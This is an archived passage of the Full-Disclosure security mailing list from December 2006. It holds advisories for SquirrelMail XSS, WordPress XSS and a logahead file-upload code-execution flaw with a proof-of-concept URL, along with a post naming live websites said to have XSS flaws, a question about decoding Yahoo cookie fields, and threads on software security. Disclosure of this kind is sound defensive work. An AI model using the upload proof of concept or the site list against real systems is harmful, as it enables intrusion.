-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061225/49bd2201/attachment.html 

From sftsi at hushmail.com  Mon Dec 25 19:05:19 2006
From: sftsi at hushmail.com (sftsi at hushmail.com)
Date: Mon, 25 Dec 2006 20:05:19 +0100
Subject: [Full-disclosure] w3m format string bug
Message-ID: <20061225190520.2801F2283E@mailserver9.hushmail.com>

http://sourceforge.net/tracker/index.php?func=detail&aid=1612792&gro
up_id=39518&atid=425439

-- SFTSI (Sympathy for the Security Industry)






Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485



From jmm at debian.org  Mon Dec 25 20:28:05 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Mon, 25 Dec 2006 21:28:05 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1241-1] New squirrelmail packages
	fix cross-site scripting
Message-ID: <20061225202805.GA3407@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1241-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
December 25th, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : squirrelmail
Vulnerability  : cross-site scripting
Problem-Type   : remote
Debian-specific: no
CVE IDs        : CVE-2006-6142

Martijn Brinkers discovered cross-site scripting vulnerabilities in the
the mailto parameter of webmail.php, the session and delete_draft
parameters of compose.php and through a shortcoming in the magicHTML
filter. An attacker could abuse these to execute malicious JavaScript in
the user's webmail session. 

Also, a workaround was made for Internet Explorer <= 5: IE will attempt
to guess the MIME type of attachments based on content, not the MIME 
header sent. Attachments could fake to be an 'harmless' JPEG, while they
were in fact HTML that Internet Explorer would render.

For the stable distribution (sarge) these problems have been fixed in
version 2:1.4.4-10.

For the upcoming stable distribution (etch) these problems have been fixed
in version 2:1.4.9a-1.

For the unstable distribution (sid) these problems have been fixed in
version 2:1.4.9a-1.

We recommend that you upgrade your squirrelmail package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.4-10.dsc
      Size/MD5 checksum:      680 cc443dbfaaf32fc0f157bc9dee46c937
    http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.4-10.diff.gz
      Size/MD5 checksum:    28247 5a19e089f41344b4a8a556ced2da3917
    http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.4.orig.tar.gz
      Size/MD5 checksum:   575871 f50548b6f4f24d28afb5e6048977f4da

  Architecture independent components:

    http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.4.4-10_all.deb
      Size/MD5 checksum:   571102 f5f9f495411c7bdc3455a1e3b0598352

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFkDQeXm3vHE4uyloRAg5KAJ9tO0b3ZkllQqg3SHdhTli77XWyZgCg1UMk
alonORYJqsjsh8zIuy1eg6M=
=t5jf
-----END PGP SIGNATURE-----









From corrado.liotta at alice.it  Mon Dec 25 21:18:07 2006
From: corrado.liotta at alice.it (corrado.liotta at alice.it)
Date: Mon, 25 Dec 2006 22:18:07 +0100
Subject: [Full-disclosure] logahead UNU edition 1.0 Remote upload file &
	code execution
Message-ID: 


-=[--------------------ADVISORY-------------------]=-
                                              
              logahead UNU edition 1.0     
                                               
  Author: CorryL    [corryl80 at gmail.com]   
-=[-----------------------------------------------]=-


-=[+] Application:    logahead UNU edition
-=[+] Version:        1.0
-=[+] Vendor's URL:   http://typo.i24.cc/logahead/ 
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Remote Upload file & Code execution
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:          CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.x0n3-h4ck.org
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:        irc.darksin.net #x0n3-h4ck        
-=[+] Special Thanks: Merry Christmas for All, Thanks for all  #x0n3-h4ck member, 
                                  un saluto a tutti gli avolesi nel mondo.

..::[ Descriprion ]::..

You might already have heard of logahead - the ajaxified blogging engine using PHP4 and mySQL database by James from the UK.
The UNU edition is based on the logahead beta 1.0 code published under GNU/GPL license. While the original version sticks to the basic functions of a blog (mainly publishing posts and receiving comments), the UNU edition is more enchanted and offers a number of additional features.


..::[ Bug ]::..

My give searches the form Widgets of this blog is results vulnerability, in fact
a remote attaker is able to upload also a file php, and to perform arbitrary commands
inside the server victim.

..::[ Proof Of Concept ]::..

http://www.server-victim/extras/plugins/widged/_widged.php?A=U&D= 


..::[ Disclousure Timeline ]::..

 [25/12/2006] - Public disclousure


**************
Registrati ad Alice Basic e scarica Alice Messenger, 
il nuovo instant messenger che ti fa chattare GRATIS con i tuoi amici!
Per maggiori informazioni vai su: 
http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061225/28607cb4/attachment.html 

From codeshepherd at gmail.com  Tue Dec 26 07:17:23 2006
From: codeshepherd at gmail.com (Deepan)
Date: Tue, 26 Dec 2006 15:17:23 +0800
Subject: [Full-disclosure] xss problems
Message-ID: <1167117443.2619.30.camel@codeworld>

Hi All,
 The following sites have XSS problems

1)  http://chennaionline.com/search/  ( the first search box ) 

The user input for search is later displayed in the result page. No
filtering is done to remove Java Scripts in the query. 


2) http://www.sdbj.com/forgot.asp  

	user is a valid field in the table where email is stored. 

3) http://www.visionoss.com/login/forgotpassword/

     userEmail is a valid field in the table where email is stored. 

I had reported my findings. I am just trying to learn the basics of XSS.
I have few doubts. The site 

http://www.xdisclose.com/tools/yahoocookiepoc.html is capable of
decrypting yahoo cookies. I fail to understand how they decrypt the user
name, dob and country details from cookie.

The relavent cookie contents are 

Y=v=1&n=3nkia0lkek00v
l=h4fb820j4c08b/o
p=m2kvvin013000000
jb=16|47|
iz=600042
r=ak
lg=us
intl=us
np=1


l stands for username, 
p stands for country, year of birth, gender 


Can someone tell me how xdisclose.com tools decrypt username, country,
year of birth and other details. 

-- 
-----------------------------------------------
Regards
Deepan Chakravarthy N
http://www.codeshepherd.com/
http://sudoku-solver.net/



From codeshepherd at gmail.com  Tue Dec 26 08:19:35 2006
From: codeshepherd at gmail.com (Deepan)
Date: Tue, 26 Dec 2006 16:19:35 +0800
Subject: [Full-disclosure] xss problems
In-Reply-To: <1167117443.2619.30.camel@codeworld>
References: <1167117443.2619.30.camel@codeworld>
Message-ID: <1167121175.2619.32.camel@codeworld>

On Tue, 2006-12-26 at 15:17 +0800, Deepan wrote:
> Hi All,
>  The following sites have XSS problems
> 
> 1)  http://chennaionline.com/search/  ( the first search box ) 
> 
> The user input for search is later displayed in the result page. No
> filtering is done to remove Java Scripts in the query. 
> 
> 
> 2) http://www.sdbj.com/forgot.asp  
> 
> 	user is a valid field in the table where email is stored. 
> 
> 3) http://www.visionoss.com/login/forgotpassword/
> 
>      userEmail is a valid field in the table where email is stored. 
> 
> I had reported my findings. I am just trying to learn the basics of XSS.
> I have few doubts. The site 
> 
> http://www.xdisclose.com/tools/yahoocookiepoc.html is capable of
> decrypting yahoo cookies. I fail to understand how they decrypt the user
> name, dob and country details from cookie.
> 
> The relavent cookie contents are 
> 
> Y=v=1&n=3nkia0lkek00v
> l=h4fb820j4c08b/o
> p=m2kvvin013000000
> jb=16|47|
> iz=600042
> r=ak
> lg=us
> intl=us
> np=1
> 
> 
> l stands for username, 
> p stands for country, year of birth, gender 
> 
> 
> Can someone tell me how xdisclose.com tools decrypt username, country,
> year of birth and other details. 



I found the code for user id. It is mapped this way
abcdefghijklmnopqrstuvwxyz =>  0123456789abcdefghijklmnop




From kf_lists at digitalmunition.com  Tue Dec 26 16:25:54 2006
From: kf_lists at digitalmunition.com (kf_lists)
Date: Tue, 26 Dec 2006 11:25:54 -0500
Subject: [Full-disclosure] AppleScript: Even easier than VBS?
Message-ID: <45914D12.8070002@digitalmunition.com>

http://blog.info-pull.com/2006/12/26/applescript-even-easier-than-vbs-i/

-KF



From info at sacure.com  Tue Dec 26 16:33:59 2006
From: info at sacure.com (Todd Michael Cohan)
Date: Tue, 26 Dec 2006 11:33:59 -0500
Subject: [Full-disclosure] SACURE IS A REAL COMPANY!
Message-ID: <015c01c7290b$b6c76b50$6401110a@TMCLaptop>

Response from CEO regarding 12.22.06 posting.

Please note that as of September 29, 2006, Jeff Bernstein was no longer 
employed by Sacure Corporation.  Any concerns or problems that you may have
had with Mr. Bernstein during his employment at Sacure, please feel free to 
contact me directly to discuss.

I sincerely apologize for any inconvenience.

Todd Michael Cohan
CEO
www.sacure.com
732.469.1300 x. 11 



From auto475758 at hushmail.com  Tue Dec 26 18:51:07 2006
From: auto475758 at hushmail.com (auto475758 at hushmail.com)
Date: Tue, 26 Dec 2006 13:51:07 -0500
Subject: [Full-disclosure] Sacure Enterprise Security - Real Company!
Message-ID: <20061226185107.E11A0DA84A@mailserver8.hushmail.com>

I am a CTO of a large company in NYC and have been very satisfied 
with Sacure Enterprise Security www.sacure.com and the staff.  They 
were responsive, professional and credible.

Initially, Jeff fed me the same lines but he was apparently fired, 
(sometime over the summer), and the President contacted me 
afterwards to follow-up. Since, I have been dealing with a new rep 
and have been nothing but satisfied with the professionalism at 
Sacure.

Hope this helps.



Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485



From exceed at email.si  Tue Dec 26 19:53:02 2006
From: exceed at email.si (/dev/null)
Date: Tue, 26 Dec 2006 20:53:02 +0100
Subject: [Full-disclosure] Vista RDP bug?
Message-ID: <20061226195313.0427A8B91B@www1.email.si>

This is from Digg:

http://www.digg.com/security/Flaws_Detected_in_Microsoft_s_Vista#c4423646

Can anyone reproduce this?

Cheers,
/ex.

____________________
http://www.email.si/



From coderman at gmail.com  Tue Dec 26 20:02:05 2006
From: coderman at gmail.com (coderman)
Date: Tue, 26 Dec 2006 12:02:05 -0800
Subject: [Full-disclosure] [WEB SECURITY] Re: comparing information
	security to other industries
In-Reply-To: <2fd9390e0612250318l44fa543dh88a8bed60d184bc2@mail.gmail.com>
References: 
	<200612192117.kBJLHcSs024632@turing-police.cc.vt.edu>
	<4ef5fec60612191410n538b0414oa6b976e55865a4d2@mail.gmail.com>
	<2fd9390e0612250318l44fa543dh88a8bed60d184bc2@mail.gmail.com>
Message-ID: <4ef5fec60612261202u55d767c3l2ff9c0c5493ca513@mail.gmail.com>

On 12/25/06, Andre Gironda  wrote:
> ...
> how about never? http://www.cs.columbia.edu/~smb/papers/acm-predict.pdf
>
> it is quite likely that the implications of risk in information
> security is something we just have to live with for our lifetimes and
> probably our childrens' lifetimes.

how seductive; to discard accountability and responsibility with
sophistry.  there is risk, and there is gross incompetence.

the vast majority of software developed does not pursue even trivial
security assurances.
look at the month of kernel bugs to see how common and trivial
validations are ignored in critical kernel interfaces to file systems
and device drivers, thus subverting the integrity of the entire
operating system and applications.

it is indeed folly to expect perfection in a human process of software
engineering, but it is nothing less than incompetence and dishonesty
to suggest that the existing state of affairs is somehow unavoidable.


> here's a disturbing question - when is law enforcement going to mature
> to the point where there is no crime?

law enforcement is a better example of the requisite defense in depth
and reasonable risk management than current IT practice.  there are
elements of prevention, anomaly detection, continual refinement,
mitigation, and accountability in place.  compared to modern software
and information technology systems it has progressed by leaps and
bounds.

we don't need perfection, but we do need to accept responsibility for
the truly crappy state of IT software and systems in place today.



From Larry at larryseltzer.com  Tue Dec 26 22:25:31 2006
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Tue, 26 Dec 2006 17:25:31 -0500
Subject: [Full-disclosure] FW:  Vista RDP bug?
Message-ID: <0273B67044957C41BD71D12EBA2E00AE08C57D@becca.LarrySeltzer.local>

>>http://www.digg.com/security/Flaws_Detected_in_Microsoft_s_Vista#c4423
646

[[People are going to be suprised how buggy Vista is when they use it
for a good solid 3 months. I've been using Vista in my own machine at
work, and its just horrible. Besides the compatibility problems, alot of
things are buggy. For example, if you RDP into VIsta and move some
windows around on the screen the whole GUI crashes within RDP. If you
logout and try to reset the connection you cant. RDP is crashed and only
a restart will fix the problem.]]

Beware of reports like this that make general statements. Obviously RDP
isn't as buggy as he claims. I've used it lots of times with no such
problems. He probably has a bad driver.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com 



From kf_lists at digitalmunition.com  Tue Dec 26 23:13:20 2006
From: kf_lists at digitalmunition.com (K F (lists))
Date: Tue, 26 Dec 2006 18:13:20 -0500
Subject: [Full-disclosure] Sacure Enterprise Security - Real Company!
In-Reply-To: <20061226185107.E11A0DA84A@mailserver8.hushmail.com>
References: <20061226185107.E11A0DA84A@mailserver8.hushmail.com>
Message-ID: <4591AC90.3020201@digitalmunition.com>

Sheesh... funny that this chump said he was in with the individual that 
single handedly started the HP / DMCA fiasco.
Since that person is most likely ME (or a former employee of mine) and I 
have never heard of this guy I got a good belly laugh out of this.

So Jeff... do me a favor buddy... keep my name out your mouth. You don't 
know me (queue song by T.I). 
-KF


auto475758 at hushmail.com wrote:
> I am a CTO of a large company in NYC and have been very satisfied 
> with Sacure Enterprise Security www.sacure.com and the staff.  They 
> were responsive, professional and credible.
>
> Initially, Jeff fed me the same lines but he was apparently fired, 
> (sometime over the summer), and the President contacted me 
> afterwards to follow-up. Since, I have been dealing with a new rep 
> and have been nothing but satisfied with the professionalism at 
> Sacure.
>
> Hope this helps.
>
>
>
> Concerned about your privacy? Instantly send FREE secure email, no account required
> http://www.hushmail.com/send?l=480
>
> Get the best prices on SSL certificates from Hushmail
> https://www.hushssl.com?l=485
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>   



From peak at argo.troja.mff.cuni.cz  Tue Dec 26 23:47:07 2006
From: peak at argo.troja.mff.cuni.cz (Pavel Kankovsky)
Date: Wed, 27 Dec 2006 00:47:07 +0100 (CET)
Subject: [Full-disclosure] emergent security properties
In-Reply-To: 
Message-ID: <20061227002450.932.0@paddy.troja.mff.cuni.cz>

On Mon, 18 Dec 2006, Nguyen Pham wrote:

> The problem is that I can hardly find out some real examples in the
> field of network security in terms of sub-networks, firewalls, servers,
> applications, etc. with their corresponding security properties.

A trivial emergent loss of security: You have some persons and every
person is operating his or her own personal computer. No person has
physical access to anyone else's computer. As long as the computers are
isolated, the system can be quite secure even if in the presence of
various security holes in software and hardware. The only person who can
exploit them is (via) the owner of the computer. Connect all those
computers to a network and... (Any similarity to any existing global
network is purely coincidental.)

I am afraid it will be pretty difficult to find an example where the
security increases with complexity. Perhaps some Byzantine
"security-breach tolerant" systems?


--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."



From krainium at gmail.com  Tue Dec 26 23:28:10 2006
From: krainium at gmail.com (Krainium)
Date: Tue, 26 Dec 2006 17:28:10 -0600
Subject: [Full-disclosure] [WEB SECURITY] Re: comparing information
	security to other industries
In-Reply-To: <4ef5fec60612261202u55d767c3l2ff9c0c5493ca513@mail.gmail.com>
References: 
	<2fd9390e0612250318l44fa543dh88a8bed60d184bc2@mail.gmail.com>
	<4ef5fec60612261202u55d767c3l2ff9c0c5493ca513@mail.gmail.com>
Message-ID: <200612261728.20803.krainium@gmail.com>

On Tuesday 26 December 2006 14:02, coderman wrote:
 


> the vast majority of software developed does not pursue even trivial
> security assurances.
> look at the month of kernel bugs to see how common and trivial
> validations are ignored in critical kernel interfaces to file systems
> and device drivers, thus subverting the integrity of the entire
> operating system and applications.

Agreed.  It's interesting to note that many of these issues could be prevented 
simply through security-minded coding practices.
 
> it is indeed folly to expect perfection in a human process of software
> engineering, but it is nothing less than incompetence and dishonesty
> to suggest that the existing state of affairs is somehow unavoidable.

Programmers I know usually like to take a sense of accomplishment and  
ownership in the software they write.  But when management enforces 
unrealistic and draconian project milestones, quality suffers.  This is a 
simple case of "follow the money."

> we don't need perfection, but we do need to accept responsibility for
> the truly crappy state of IT software and systems in place today.

We are accepting responsibility for the vulnerability-riddled IT  
infrastructure we all depend on daily.  The mushrooming demand for IT 
security professionals is a direct result of businesses and users taking the 
responsibility.  

This in itself is very interesting - we have an entire market segment where 
the buyer/user shoulders an expense (and often a liability) caused from the 
producer's defective  products.  How long would a pharmaceutical company 
exist if it's drugs were known to be poisonous?  Would the patient buy and 
take the antidote so they could continue using the drug, much like we now buy 
and use all kinds of antivirus, anti-trojan, anti-spyware, etc? Restaurants 
have expired because of word-of-mouth rumors of poor tasting food.  Yet 
mega-billion dollar software companies flourish and grow, pumping big money 
into glitzy advertising campaigns, hawking products infested with weakness. 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061226/14fbf891/attachment.bin 

From coderman at gmail.com  Wed Dec 27 00:19:46 2006
From: coderman at gmail.com (coderman)
Date: Tue, 26 Dec 2006 16:19:46 -0800
Subject: [Full-disclosure] emergent security properties
In-Reply-To: <20061227002450.932.0@paddy.troja.mff.cuni.cz>
References: 
	<20061227002450.932.0@paddy.troja.mff.cuni.cz>
Message-ID: <4ef5fec60612261619rdbada1asd82ca8821cebcaaf@mail.gmail.com>

On 12/26/06, Pavel Kankovsky  wrote:
> ...
> I am afraid it will be pretty difficult to find an example where the
> security increases with complexity. Perhaps some Byzantine
> "security-breach tolerant" systems?

the only example that comes to mind is distributed / collaborative
anomaly detection systems which become more robust with a larger
number of entities and interactions to observe.

in such a scenario, the ability of the system to accurately "detect"
malicious activities or unusual failures would increase with the
complexity of the system.

[though this exposes a critical distributed component to attackers;
poorly implemented and you've got a global witty worm, or worse...]



From rdobbins at cisco.com  Wed Dec 27 01:32:24 2006
From: rdobbins at cisco.com (Roland Dobbins)
Date: Tue, 26 Dec 2006 17:32:24 -0800
Subject: [Full-disclosure] emergent security properties
In-Reply-To: <4ef5fec60612261619rdbada1asd82ca8821cebcaaf@mail.gmail.com>
References: 
	<20061227002450.932.0@paddy.troja.mff.cuni.cz>
	<4ef5fec60612261619rdbada1asd82ca8821cebcaaf@mail.gmail.com>
Message-ID: 


On Dec 26, 2006, at 4:19 PM, coderman wrote:

> the only example that comes to mind is distributed / collaborative
> anomaly detection systems which become more robust with a larger
> number of entities and interactions to observe.

While scale introduced complexity in terms of opex and maintenance,  
I'm not sure it carries the distinction of qualitative complexity  
implied by the previous poster.

Perhaps a better example would be an anomaly-detection system which  
correlates multiple types of telemetry with differing paradigms (say,  
NetFlow alongside syslog) in order to increase the fidelity of  
detection/classification/traceback/analysis.

Another example would be introducing antispoofing functionality into  
a network infrastructure by deploying uRPF, IP Source Verify, iACLs,  
et. al. - this does introduce more complexity into the system, but it  
has very real security benefits both for the deploying organization  
as well as other organizations who in some fashion interconnect to  
one degree or another with the deploying organization (i.e., everyone  
on the public Internet, business partners interconnected via extranet  
WAN links or VPN tunnels, etc.).  Enabling telemetry export/ 
collection/analysis, deploying iACLS/rACLs/CoPP, enabling telemetry  
export to collection/analysis systems, and many other similar  
activities are also examples of increased complexity leading to  
better security.

As an aside, Slammer did not in fact take down 'much of the  
Internet'; some SP infrastructure was affected, but the vast majority  
of networks affected were enterprise networks.

http://www.caida.org/publications/papers/2003/sapphire/sapphire.html

http://www.beyondbgp.net/pubs/2003/bbgp_iwdc03.pdf

http://momo.lcs.mit.edu/slammer/

http://www.eecs.umich.edu/~zmao/Papers/SPECTS06-camera.pdf


-----------------------------------------------------------------------
Roland Dobbins  // 408.527.6376 voice

		All battles are perpetual.

     		   -- Milton Friedman





From icecoldeuro at gmail.com  Wed Dec 27 00:28:57 2006
From: icecoldeuro at gmail.com (icecoldeuro at gmail.com)
Date: Tue, 26 Dec 2006 19:28:57 -0500
Subject: [Full-disclosure] SQID v0.2 - SQL Injection Digger.
Message-ID: 

So - hypothetically - the first result of the sample run at
sqid.rubyforge.org would only yield a Microsoft OLE DB provider error (Unclosed
quotation mark before the character string).

Now, granted, this is bad practice if they can't trap their errors, but I
also don't see how this constitutes proof of an XSS vulnerability. The usual
XSS variations - again, purely hypothetically - all just yield the same
error message.

Would you consider this a potential false positive then? In my opinion it's
not a vuln unless it's exploitable.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061226/ea833e5d/attachment.html 

From peter at peterswire.net  Wed Dec 27 03:53:46 2006
From: peter at peterswire.net (Peter Swire)
Date: Tue, 26 Dec 2006 20:53:46 -0700
Subject: [Full-disclosure] emergent security properties
Message-ID: <20061226205346.75861c3cbc74dd252a82f7c670c31500.95c9084da0.wbe@email.secureserver.net>

An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061226/ae572e4b/attachment.html 

From zim at vegaa.de  Wed Dec 27 10:12:34 2006
From: zim at vegaa.de (Michael Zimmermann)
Date: Wed, 27 Dec 2006 11:12:34 +0100
Subject: [Full-disclosure] [WEB SECURITY] Re: comparing
	information	security to other industries
In-Reply-To: <2fd9390e0612250318l44fa543dh88a8bed60d184bc2@mail.gmail.com>
References: 
	<200612192117.kBJLHcSs024632@turing-police.cc.vt.edu>
	<4ef5fec60612191410n538b0414oa6b976e55865a4d2@mail.gmail.com>
	<2fd9390e0612250318l44fa543dh88a8bed60d184bc2@mail.gmail.com>
Message-ID: <1167214354.5129.36.camel@k7.khidr.net>

Hi Andre and list,

Am Montag, den 25.12.2006, 04:18 -0700 schrieb Andre Gironda:

> here's a disturbing question - when is law enforcement going to mature
> to the point where there is no crime?

Law enforcement and crime have a common cause,
hence one is not going to win over the other ever.

Same is true for bad coding practises and "follow the money"
projects. They create each other to a certain degree.


Our problems cannot be solved only within the 
realm of earning money and selling products.
We need to look deeper and look at what we
are doing to intensify the problems or what 
we could do to lessen them - in our personal
daily environment.

The actual situation is at it is, that cannot
be changed now, the only thing we can change
- perhaps - is what we do and don't do today.


I think, one possible way to improve the situation 
is to follow the money to a lesser degree. In our
own job as well as in our role as a customer.
Ready for that? Ready to live with less money?

Ready to do more for others and get less for yourself?

Ready to support an open source product with your
own unpaid work - or to support it with your money?
Why not an open-source system you are using anyway
or would like to use, if it only existed?


And of course we must be willing to put more time 
into quality-ensuring work of which good documentation
is an important part. Many IT-professionals I know
try to avoid both.


We cannot demand a matured IT if we don't grow up
ourselves first. And if we do, then the IT will
mature around us more or less naturally.



Michael



From coderman at gmail.com  Wed Dec 27 11:51:27 2006
From: coderman at gmail.com (coderman)
Date: Wed, 27 Dec 2006 03:51:27 -0800
Subject: [Full-disclosure] emergent security properties
In-Reply-To: 
References: 
	<20061227002450.932.0@paddy.troja.mff.cuni.cz>
	<4ef5fec60612261619rdbada1asd82ca8821cebcaaf@mail.gmail.com>
	
Message-ID: <4ef5fec60612270351l159b2fdcv7697305a8b644865@mail.gmail.com>

On 12/26/06, Roland Dobbins  wrote:
> ...
> Another example would be introducing antispoofing functionality into
> a network infrastructure by deploying uRPF, IP Source Verify, iACLs,
> et. al. [...] are also examples of increased complexity leading to
> better security.

uRPF, IP Source Verify, iACLs and friends work great at any scale
(linear more or less) thus lacking any notable emergent properties
despite being useful.  anti fraud measures and similar transaction
based anomaly detection in financial industries are a nice analogy
though (incidentally, this approach is working better for online
banking than N-factor authentication hacks being trialed and discarded
for marginal, if any effective benefit on compromised worm and malware
infested platforms...).


> As an aside, Slammer did not in fact take down 'much of the
> Internet'; some SP infrastructure was affected, but the vast majority
> of networks affected were enterprise networks.

right, a three minute ACL annoyance at worst for anyone who knows how
to manage a network.  slammer was a nice media blurb of passing
interest.  witty a vicious test case of more significant weight (the
theoretical favorite being a curious yellow / warhol worm vector).



From kevin at trifinite.org  Tue Dec 26 16:30:16 2006
From: kevin at trifinite.org (kfinisterre)
Date: Tue, 26 Dec 2006 11:30:16 -0500
Subject: [Full-disclosure] AppleScript: Even easier than VBS?
Message-ID: <45914E18.8070007@trifinite.org>

Merry Christmas from LMH.

http://blog.info-pull.com/2006/12/26/applescript-even-easier-than-vbs-i/

-KF



From david.kierznowski at gmail.com  Wed Dec 27 09:33:16 2006
From: david.kierznowski at gmail.com (David Kierznowski)
Date: Wed, 27 Dec 2006 09:33:16 +0000
Subject: [Full-disclosure] WordPress Persistent XSS
Message-ID: 

Vulnerability Title: WordPress Persistent XSS
Author: David Kierznowski
Homepage: http://michaeldaw.org
Software Vendor: WordPress Persistent XSS
Versions affected: Confirmed in v2.0.5 (latest)

See homepage for more details.

WordPress was contacted: 26/12/06 22:04 BST
Reply received: 27/12/06 06:11 BST
WordPress has fixed this for v2.0.6, see
http://trac.wordpress.org/changeset/4665



From coderman at gmail.com  Wed Dec 27 12:15:50 2006
From: coderman at gmail.com (coderman)
Date: Wed, 27 Dec 2006 04:15:50 -0800
Subject: [Full-disclosure] [WEB SECURITY] Re: comparing information
	security to other industries
In-Reply-To: <1167214354.5129.36.camel@k7.khidr.net>
References: 
	<200612192117.kBJLHcSs024632@turing-police.cc.vt.edu>
	<4ef5fec60612191410n538b0414oa6b976e55865a4d2@mail.gmail.com>
	<2fd9390e0612250318l44fa543dh88a8bed60d184bc2@mail.gmail.com>
	<1167214354.5129.36.camel@k7.khidr.net>
Message-ID: <4ef5fec60612270415s6640c6b4r21113c40ceb32309@mail.gmail.com>

On 12/27/06, Michael Zimmermann  wrote:
> ...
> I think, one possible way to improve the situation
> is to follow the money to a lesser degree. In our
> own job as well as in our role as a customer.
> Ready for that?

if the answer is going to be YES, then the consumer (you) needs a
simple way to visibly and intuitively compare the relative security
merits of similar integrated systems / domains. [0]

some of the aspects / characteristics of interest may include:
- usability!
- defense in depth to guard against failures of privacy,
authentication, or availability [1]
- accountability and oversight of critical operations / privileges
- transparency to expert review and other methods of assuring
integrity (this is one aspect of security where open source software
may provide stronger reputation)

security has to begin at development and the tools for measuring
security aspects at this level and out into protocols and hardware
platform are few and rarely used.  (look at the MOKB for a recent
reminder...) [2]


0. application and/or operating system security is meaningless by
itself given the way the security flaws of either affect each other
from a user view or effective risk comparison.

1. this is one example where virtualization is a useful way to
constrain the attack surface presented to attackers.  chroot and other
resource access control methods can be viewed as a subset of
virtualization like isolation between security domains useful for
strong defense in depth along with existing best practices for
development and host integrity.

2. "Month of Kernel Bugs"
    http://projects.info-pull.com/mokb/
    [fuzz testing, automated regression and load/stress tests,
defensive coding techniques and other measures that address almost all
of the vulnerabilities on this list should be a standard part of any
software development process associated with components of a secure
computing base under the "methods of assuring integrity" aspect of
improving security (the secure computing base including anything
handling cryptographic keys or privileged operating system
functions).]



From eaton.lists at gmail.com  Wed Dec 27 13:41:15 2006
From: eaton.lists at gmail.com (Brian Eaton)
Date: Wed, 27 Dec 2006 08:41:15 -0500
Subject: [Full-disclosure] emergent security properties
In-Reply-To: <20061227002450.932.0@paddy.troja.mff.cuni.cz>
References: 
	<20061227002450.932.0@paddy.troja.mff.cuni.cz>
Message-ID: <242a0a8f0612270541j1587e731w4d946bfe036740b0@mail.gmail.com>

On 12/26/06, Pavel Kankovsky  wrote:
> I am afraid it will be pretty difficult to find an example where the
> security increases with complexity. Perhaps some Byzantine
> "security-breach tolerant" systems?

Defense-in-depth seems to be an example of when security systems
become both more complex and more secure.  But it's hard to classify
that as an 'emergent' property of the system.  I'd hesitate to call
any accidental property of a system a security feature.

Regards,
Brian



From need4angel at hotmail.com  Wed Dec 27 16:10:35 2006
From: need4angel at hotmail.com (BART. ....)
Date: Wed, 27 Dec 2006 16:10:35 +0000
Subject: [Full-disclosure] FW: [Fwd: Re[2]: Fun with event logs
	(semi-offtopic)]
Message-ID: 

Dear 3APA3A,

Correct me if i am wrong, but it looks like it's documented behavior of the 
event viewer.
This is what i found:

Note that there is no way to log a string that contains %n, where n is an 
integer value. This syntax is used in IPv6 addresses, so it is a problem to 
log an event message that contains an IPv6 address. For example, if the 
message text contains %1, the event viewer treats it as an insertion string. 
If the string contains %%1, the event viewer literally uses %%1.

Source:
http://msdn2.microsoft.com/en-us/library/aa363679.aspx

Greetz,
B

>-------- Original Message --------
>Subject: 	Re[2]: [Full-disclosure] Fun with event logs (semi-offtopic)
>Date: 	Thu, 21 Dec 2006 20:13:14 +0300
>From: 	3APA3A <3APA3A at SECURITY.NNOV.RU>
>Reply-To: 	3APA3A <3APA3A at SECURITY.NNOV.RU>
>Organization: 	http://www.security.nnov.ru
>To: 	Michele Cicciotti 
>CC: 	full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com
>References: 	<20061221122536.6AA7A1D8F7C at supertolla.itapac.net> 
><20061221152104.A96731D8F79 at supertolla.itapac.net>
>
>
>
>Dear Michele Cicciotti,
>
>--Thursday, December 21, 2006, 6:20:54 PM, you wrote to 
